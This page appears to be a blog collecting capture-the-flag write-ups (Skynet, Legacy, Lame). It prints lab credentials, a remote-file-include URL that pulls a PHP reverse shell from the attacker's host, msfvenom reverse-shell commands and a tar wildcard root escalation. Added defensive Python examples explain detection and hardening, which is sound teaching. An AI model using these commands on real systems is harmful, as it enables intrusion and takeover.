
Tag: Hack The Box

THM- SkyNet

Recon

Network Enum

I ran an nmap scan on the target machine and found these open ports:

  • ssh (22): Worth exploring
  • http (80): Web server is running
  • pop (110): Maybe an email server is running?
  • netbios-ssn (139): Worth exploring
  • imap (143): Maybe an email server is running?
  • microsoft-ds (445): SMB is worth exploring

Web Enum

I ran gobuster to enumerate directories on the web server:

gobuster dir -u http://10.10.134.0:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40

From the scan result, these are the directories found:

  • /admin
  • /css
  • /js
  • /config
  • /ai
  • /squirrelmail (this will be interesting to explore)

Most of the directories are restricted.

The squirrelmail page is working but I will need the login credentials.

I don’t have the credentials at the moment, so now the goal is to find the email credentials.

Service Enum

Now I am going to look at the SMB service running on port 445.

I ran this command to connect to the SMB anonymous share:

smbclient //[TARGET IP]/anonymous

The files look promising to find a clue on how to get the email credentials.

I ran another command to get the content of the SMB share:

smbget -R smb://[TARGET IP]/anonymous

After inspecting the content, I found a list of possible passwords (maybe they belong to Miles?).

Using Burp Intruder, I brute-forced the password for the username milesdyson.

Eventually, I found that the password for milesdyson is cyborg007haloterminator.

Once I logged in as milesdyson, I saw a bunch of emails. After reading one of the emails, I saw that the SMB password for milesdyson had been leaked.

To summarize, these are the found credentials:

Username: milesdyson

Email Password: cyborg007haloterminator

SMB Password: )s{A&2Z=F^n_E.B`

I tried to connect to the SMB milesdyson share with the username and password:

smbclient //[TARGET IP]/milesdyson -U=milesdyson

Then I managed to log in to the milesdyson share.

At first glance, most of the files are machine learning PDFs.

I went into the notes folder. There are a bunch of markdown files.

But I spotted a text file named “important.txt”.

Inside this important.txt file, I saw that milesdyson has a custom CMS with the link “

Next, enumerate the directories in the CMS.

Initially I had an issue because I didn’t put the backslash for the URL.

After I did so, I ran this command:

gobuster dir -u http://10.10.134.0:80/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40

  • /administrator was found.

Navigating to this directory, I can see a CMS named “Cuppa CMS”.

Foothold

To summarize, I found three possible ways to gain a foothold into the system.

  • ssh
  • squirrelmail
  • Cuppa CMS

ssh

I tried to brute-force the SSH login using hydra with the username milesdyson:

hydra -l milesdyson -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-500.txt [TARGET IP] ssh

But this did not work.

Squirrelmail

I searched for possible exploits for squirrelmail (version 1.4.23).

There is an interesting exploit for RCE.

https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html

I followed the steps but the exploit did not work.

Cuppa CMS

I struggled to find credentials to log in to Cuppa CMS (I tried the milesdyson credentials to see if the password was reused).

I searched for a Cuppa CMS exploit and this one seems promising:

https://www.exploit-db.com/exploits/25971

Basically, we can include a remote file without logging in to Cuppa CMS.

The examples given in the exploit:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Now I started a Python web server so that the CMS could fetch my shell files.

I tried a few ways to execute a shell.

For example, a basic PHP web shell with a cmd parameter. But this did not work.

I looked for more information about the configuration file:

http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

It seems like there is a file extension restriction. For example, .txt and .jpeg are allowed, but .php is not.

I tried creating a PHP reverse shell and then changing the file’s magic number to JPEG using a hex editor. This will make the Linux machine interpret the file as a JPEG file.
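The extension restriction described above is the kind of check that a magic-number patch is meant to slip past. As an added example (not code from the writeup or from Cuppa CMS), the validator below shows why a magic-number check on its own is not enough: a JPEG signature followed by PHP code passes it, while a layered check (extension allowlist, then signature, then a scan for PHP open tags) rejects it. The allowlist, the signatures and the sample blobs are constructed for this example.

```python
import re

# Constructed allowlist and magic numbers, modelled on the restriction described above
# (text and image extensions allowed, .php refused). Assumption, not Cuppa CMS's own code.
ALLOWED_EXTENSIONS = {"txt", "jpg", "jpeg", "png", "gif"}
MAGIC_NUMBERS = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# PHP open tags (<?php, <?=) and the legacy <script language="php"> form, case-insensitive.
PHP_MARKERS = re.compile(rb"<\?(?:php\b|=)|<script\b[^>]*\blanguage\s*=\s*['\"]?php", re.IGNORECASE)


def extension_of(filename):
    """Lower-cased extension after the last dot, or '' when there is none."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def magic_matches(extension, data):
    """True when the leading bytes carry the signature expected for the extension.

    Plain text has no signature, so .txt passes this stage; only the content
    scan in validate_upload can reject it.
    """
    signatures = MAGIC_NUMBERS.get(extension)
    if signatures is None:
        return extension == "txt"
    return any(data.startswith(sig) for sig in signatures)


def validate_upload(filename, data):
    """Layered check: extension allowlist, then magic number, then embedded-PHP scan."""
    extension = extension_of(filename)
    if extension not in ALLOWED_EXTENSIONS:
        return "reject: extension not allowed"
    if not magic_matches(extension, data):
        return "reject: content does not match extension"
    if PHP_MARKERS.search(data):
        return "reject: embedded PHP code"
    return "accept"


# Constructed sample inputs (not files from the lab).
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 16
# A JPEG signature pasted in front of PHP code: the "patch the magic number" trick.
POLYGLOT = b"\xff\xd8\xff\xe0" + b"<?php echo 'hello'; ?>"
TEXT_WITH_PHP = b"notes\n<?= 'hello' ?>\n"

if __name__ == "__main__":
    for name, blob in [("photo.jpeg", REAL_JPEG), ("photo.jpeg", POLYGLOT),
                       ("shell.php", POLYGLOT), ("notes.txt", TEXT_WITH_PHP)]:
        print(f"{name}: magic_only={magic_matches(extension_of(name), blob)}  "
              f"layered={validate_upload(name, blob)}")
```

The tag scan is a heuristic and will not catch every encoding trick; the check that actually matters on the server side is that included or uploaded files are never handed to the PHP interpreter, which is what the original text’s working `.php` request above shows was not the case here.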

I started the nc listener.

I requested the URL that calls the PHP reverse shell:

http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.4.3.145:8889/php-reverse-shell.php

This worked and I have a shell on the machine.

Immediately I entered the id and whoami commands to check what this account is.

This account is “www-data”.

I can also find the user flag in milesdyson’s home directory.

Now that I have gained a foothold, I will need to escalate privileges.
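Every step of the Cuppa CMS foothold above (the traversal to /etc/passwd, the php://filter read of Configuration.php, and the remote include of the reverse shell) leaves a request for alertConfigField.php in the web server log with a tell-tale urlConfig value. As an added example, not part of the writeup, the scanner below parses Apache combined-format lines and labels those three patterns; the log lines are constructed for this example (the CMS path mirrors the writeup, the client addresses and timestamps are made up), and the endpoint name and parameter name are taken from the exploit URLs quoted above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines (not logs from the lab machine).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /45kra24zxs28v3yd/administrator/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 1890 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://203.0.113.7:8889/php-reverse-shell.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=sidebar.php HTTP/1.1" 200 330 "-" "Mozilla/5.0"
"""

# Apache combined format: client, identd, user, [timestamp], "METHOD target PROTO", status ...
REQUEST_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
VULNERABLE_PATH = "/alerts/alertConfigField.php"   # endpoint from the exploit URLs above
PHP_WRAPPERS = ("php://", "phar://", "data:", "expect://", "zip://")


def classify_url_config(value):
    """Label a urlConfig value, or return None when it looks like an ordinary local include."""
    decoded = unquote(value)          # a second decode catches %25-style double encoding
    lowered = decoded.lower()
    if lowered.startswith(PHP_WRAPPERS):
        return "php-wrapper"          # e.g. php://filter used to read source as base64
    if re.match(r"^[a-z][a-z0-9+.-]*://", lowered):
        return "remote-include"       # any other scheme: the file is fetched from elsewhere
    if "../" in decoded or "..\\" in decoded:
        return "path-traversal"
    return None


def scan_log(text):
    """Return one finding per request that abuses urlConfig on the vulnerable endpoint."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_LINE.match(line)
        if not match:
            continue
        parts = urlsplit(match["target"])
        if not parts.path.endswith(VULNERABLE_PATH):
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("urlConfig", []):
            kind = classify_url_config(value)
            if kind is not None:
                findings.append({"src": match["src"], "time": match["ts"], "kind": kind,
                                 "value": value, "status": int(match["status"])})
    return findings


def sources_by_kind(findings):
    """Group offending client addresses by the kind of abuse seen, for a quick triage view."""
    grouped = {}
    for finding in findings:
        grouped.setdefault(finding["kind"], set()).add(finding["src"])
    return grouped


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f'{finding["time"]} {finding["src"]} {finding["kind"]:16} {finding["value"]}')
    print(sources_by_kind(scan_log(SAMPLE_LOG)))
```

A 200 status on the php-wrapper and remote-include lines is the part worth alerting on: the first means configuration source (database credentials included) was read out, the second that the server fetched and ran a file it did not host.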

Privilege Escalation

I tried to use sudo but there is an error. It seems like the shell is “jailed”.

Basically, we need to spawn a TTY shell. (Link: https://netsec.ws/?p=337)

I used a Python command to spawn one:

python -c 'import pty; pty.spawn("/bin/sh")'

Now I can run sudo, but this seems useless since I don’t know the password of the current user, “www-data”.

Then I ran some Linux enumeration scripts (lse.sh and LinEnum.sh).

It seems like the possible vectors are the crontab and the SUID binaries.

I tried the SUID binaries and struggled because of the sudo issue where I don’t know the password. So much time was wasted here.

So I looked at the crontab. It seems like there is a backup.sh job executed by the root user.

I looked at the content of backup.sh:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

So the root user changes into /var/www/html and then performs a backup.

Well, I think I am in control of the /var/www/html folder.

I looked at the Linux PE checklist again and found a similar attack vector with the use of wildcards in tar.

https://app.gitbook.com/@bobbylin/s/oscp-playbook/privilege-escalation/linux-privesc#wildcards

I should follow the exact steps. I observed that I missed one step.

I created two files:

touch /home/user/--checkpoint=1 
touch /home/user/--checkpoint-action=exec=shell.elf

Then I created shell.elf on the attacker machine and downloaded it on the target machine:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=[ATTACKER IP] LPORT=3333 -f elf -o shell.elf

Now I started the listener on the correct port and waited.

After a few minutes, there was no connection from the target machine.

This is when I took a hint and saw that there was something wrong with my shell file.

I changed the command to:

touch "/home/user/--checkpoint-action=exec=sh shell.elf"

This works and I managed to connect as root.

Look for root.txt under the root directory.
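The root cron job above is exploitable only because `tar cf ... *` lets the shell expand the glob into file names that tar then parses as options. As an added example (not the lab’s own tooling), the auditor below does the two checks a defender would run on such a script: it finds tar invocations that pass an unquoted glob and notes the directory the script has cd’d into, and it lists entries in that directory whose names start with a dash. It also prints the hardened form, which archives the directory by path (`-C dir .`) so that no file name can ever reach tar as an option. backup.sh is the script from the writeup embedded as input; the stand-in webroot with the two checkpoint file names from the writeup is constructed in a temporary directory.

```python
import os
import re
import tempfile

# The backup.sh shown above, embedded here as sample input.
BACKUP_SH = """#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
"""

# Split one script line into simple commands on ; && || and | (sufficient for cron scripts).
COMMAND_SEPARATOR = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
# A short-option cluster that includes 'f', e.g. cf, -cvf, xzf: the next operand is the archive.
FLAG_CLUSTER_WITH_F = re.compile(r"-?[A-Za-z]*f[A-Za-z]*")


def tar_wildcard_invocations(script_text):
    """Return [(line_no, cwd, archive, operand)] for tar calls that pass an unquoted glob.

    cwd is the directory named by the most recent 'cd' line (None if none was seen);
    archive is the operand after the 'f' flag cluster, or None if the form is not recognised.
    """
    findings = []
    cwd = None
    for line_no, raw in enumerate(script_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for command in COMMAND_SEPARATOR.split(line):
            tokens = command.split()
            if not tokens:
                continue
            name = os.path.basename(tokens[0])
            if name == "cd" and len(tokens) > 1:
                cwd = tokens[1]
            elif name == "tar" and len(tokens) > 2:
                archive = tokens[2] if FLAG_CLUSTER_WITH_F.fullmatch(tokens[1]) else None
                for operand in tokens[2:]:
                    # An unquoted glob is expanded by the shell into whatever names exist in cwd.
                    if "*" in operand and operand[0] not in "\"'":
                        findings.append((line_no, cwd, archive, operand))
    return findings


def option_like_names(directory):
    """Entries whose names begin with '-': a shell glob would hand these to tar as options."""
    return sorted(name for name in os.listdir(directory) if name.startswith("-"))


def hardened_tar_line(archive, directory):
    """Archive the directory by path rather than by glob, so no file name can become an option."""
    return f"tar cf {archive} -C {directory} ."


def audit(script_text, directory_override=None):
    """Combine both checks into one report; directory_override lets you audit a copy of the webroot."""
    report = []
    for line_no, cwd, archive, operand in tar_wildcard_invocations(script_text):
        target = directory_override or cwd
        names = option_like_names(target) if target and os.path.isdir(target) else []
        report.append({
            "line": line_no, "operand": operand, "cwd": cwd,
            "option_like_names": names,
            "suggested": hardened_tar_line(archive or "<archive>", cwd or "<dir>"),
        })
    return report


def demo_directory():
    """Constructed webroot stand-in holding the two file names used in the writeup."""
    path = tempfile.mkdtemp(prefix="webroot-")
    for name in ("index.html", "--checkpoint=1", "--checkpoint-action=exec=sh shell.elf"):
        open(os.path.join(path, name), "w").close()
    return path


if __name__ == "__main__":
    for entry in audit(BACKUP_SH, directory_override=demo_directory()):
        print(entry)
```

Quoting the glob (`"*"`) is not a fix, since tar would then look for a file literally named `*`; the fix is to stop naming files through the shell at all, either with `-C dir .` as above or with `find ... -print0 | tar --null -T -`, and to keep a root cron job from archiving a directory writable by www-data in the first place.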

HTB Writeup: Legacy w/o Metasploit

Overview

Recon

Quick Scan:

sudo nmap -sC -sV -O -oN nmap/quickscan.txt 10.129.125.96

Two services are identified:

  1. netbios-ssn (port:445, likely to be SMB)
  2. microsoft-ds

According to the scan result, the victim box is likely to be Microsoft Windows XP SP3 (94%) or Microsoft Windows Server 2003 SP1 or SP2 (92%).

nmap results

Enumeration

We can use nmap to check if the machine is vulnerable to any public CVEs.

locate *.nse | grep smb

Run the script to check the vulnerabilities.

sudo nmap --script "smb-vuln*" -p 445 -oN nmap/smb_vulns.txt <victim box IP addr>

We can also google for exploits relating to Windows XP SP3 and SMB.

From our enumeration, we can try these two exploits:

  1. MS08-067
  2. MS17-010

Exploit

MS08-067

Convert this script to python3: https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py

Start the netcat listener:

nc -nlvp 443

Get Local Machine IP:

ip addr | grep tun0

Generate the shellcode using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=<LOCAL MACHINE IP> LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

Copy the shellcode to exploit.py script.

Run the exploit script (make sure you have installed impacket with pip3 install impacket).

Remember that the machine is Windows XP and likely to be SP3. So let’s choose option 6.

python3 exploit.py <VICTIM BOX IP ADDR> 6 445

There will be a callback on the listener.

The root.txt is in the Desktop folder.

Reflections on the lab

It took me days to achieve a successful exploit. One of the reasons is that I spent two days debugging Python 2 exploit scripts for MS17-010 (EternalBlue). There was some issue with using pip2 to install impacket. Therefore I targeted MS08-067 instead.

  • If you are stuck with a debugging issue, you need to time-box it and move on. You can revisit the issue in the future. EternalBlue is one of the famous NSA exploits. I will definitely need to figure out how to fix the issues when running the exploit script.
  • I confused LHOST with the IP address of the victim box. Instead, I should remember that LHOST is the IP address of the local VM.
  • You can enumerate vulnerabilities using nmap as well, not just with searchsploit.
  • Convert Python 2 scripts to Python 3 scripts with an online tool such as this one.

HTB Writeup: Lame w/o Metasploit

Overview

  • Run two nmap scans to determine the open ports, services and OS.
  • Based on the discovered information, search for possible exploits.
  • Look for exploit scripts for each service version to gain root.
  • Test the exploits to see if the discovered services are exploitable.

Recon

nmap options

  • -O <Enable OS detection>
  • -sC <Run default scripts>
  • -sV <Probe open ports to determine service/version info>
  • -oA <Output to all format>
  • -p- <Scan all ports>

Quick scan

sudo nmap -sC -sV -O -oA quickscan 10.10.10.3

Full scan

sudo nmap -p- -sC -sV -O -oA fullscan 10.10.10.3

We can see there is an additional service that was not discovered by the quick scan.


Enumeration

We discovered five attack surfaces from our port scanning results. They are:

  1. ftp (port:21, version: vsftpd 2.3.4)
  2. ssh (port:22, version:OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0))
  3. netbios-ssn (port:139, version:Samba smbd 3.X – 4.X (workgroup: WORKGROUP))
  4. netbios-ssn (port:445, version:Samba smbd 3.0.20-Debian (workgroup: WORKGROUP))
  5. distccd (port:3632, version: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

FTP

One convenient way of checking if the service version has an exploit is to use the searchsploit tool in Kali Linux. Here we can see that this particular FTP version has a reported exploit.

We can try googling for a Python exploit. I found this one on GitHub:

https://github.com/ahervias77/vsftpd-2.3.4-exploit/blob/master/vsftpd_234_exploit.py

However, when I executed the script, the exploit was not successful. The script was stuck and did not progress further.

SSH

There are a few user enumeration attacks on SSH. These usually take time, and we can come back to them if the other services are not exploitable.

Samba

This particular version of Samba has an exploit available.

I found an exploit script in Python: https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py

You will need to update the script by following the steps below:

  • Get your LHOST: ip addr | grep tun0
  • Generate the reverse netcat buffer payload: msfvenom -p cmd/unix/reverse_netcat LHOST=<Your LHOST> LPORT=<Specify any port> -f python
  • Replace lines 8 to 15 with the generated payload from msfvenom.
  • Update the victim IP to the box IP address.
  • Remove line 1.
  • Install pysmb: pip install pysmb

Exploit

Samba

  • Start netcat: nc -nlvp 1337
  • Run the exploit: python3 exploit-smb-3.0.20.py

Now we can run commands to get the flag as the root user.


Reflections on the lab

This was the first lab that I have completed in Hack The Box (HTB). I learned a few things here:

  • This is a bit different from purely web application hacking, which I am more familiar with. You need to perform recon and systematically enumerate the services.
  • You need to know how to look for exploits and how to modify and debug the scripts that you find online.
  • You need to know some tools such as msfvenom, netcat, and Python.
  • Also, port scanning needs to be thorough in order to discover the services that the quick scan does not find.